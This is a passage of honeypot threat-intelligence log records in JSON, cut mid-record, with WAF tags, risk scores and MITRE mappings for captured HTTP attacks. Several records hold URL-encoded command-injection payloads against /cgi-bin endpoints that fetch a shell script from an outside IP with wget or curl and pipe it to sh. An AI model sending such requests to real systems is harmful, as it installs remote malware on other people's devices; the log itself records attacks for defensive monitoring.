\u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":306},{"id":11860766,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59894,"dst_port":81,"service":"http","classification":"config_file_probe","waf_score":54,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00224a88e49893c2a046ae43e9c622b2582e2a7b45a3\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 291, \u0022payload_entropy\u0022: 5.102798374546219, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022fb60b57f78cfe2f06db7faa03bf87001297f9c4e\u0022, \u0022event_fingerprint\u0022: \u00226de544321b303864dad85ab369208f5cdd4c7f03\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00223d2e6e67aa4b06840e8434286f85d271\u0022, \u0022path_pattern_hash\u0022: \u00221aae85e63b4d4e5c752317f5de257989\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60\u0022, \u0022query_string\u0022: \u0022name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%2\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60\u0022, \u0022query_string\u0022: \u0022name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%60 HTTP\/1.1\\r\\nHost: 6\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%2\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00224380c9db89f19257d1226875ec709df6393d763a\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%2\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20toto5%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bcurl%20http:\/\/91\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20toto5%3Bbusybox%20wget%2\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":291},{"id":11860767,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":59900,"dst_port":81,"service":"http","classification":"config_file_probe","waf_score":60,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00221a56c88a2a28a00a0b773a91cea242bcf3ae7b29\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 280, \u0022payload_entropy\u0022: 5.050467367309293, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 17, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022b4bef8c54a2ea9c9dfc36a5b081989ae0307a535\u0022, \u0022event_fingerprint\u0022: \u0022a9cc8cf870e4c477dbc7584e8674eb9aed1d552d\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022, \u0022pat-0245\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022, \u0022Probe \/cgi-bin\/luci\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022, \u0022pat-0245\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002244ffcf3c1f570df3dc4728f744986dc3\u0022, \u0022path_pattern_hash\u0022: \u0022433e044dd5893c3ac149081d90651f83\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60\u0022, \u0022query_string\u0022: \u0022cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60\u0022, \u0022query_string\u0022: \u0022cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tuoshi%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:8\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/luci?cmd=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tuoshi%3Bbusybox%20wget%20http:\/\/91.92\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00224779af06d373d05d019bab1bdd63509634dc8e8a\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: 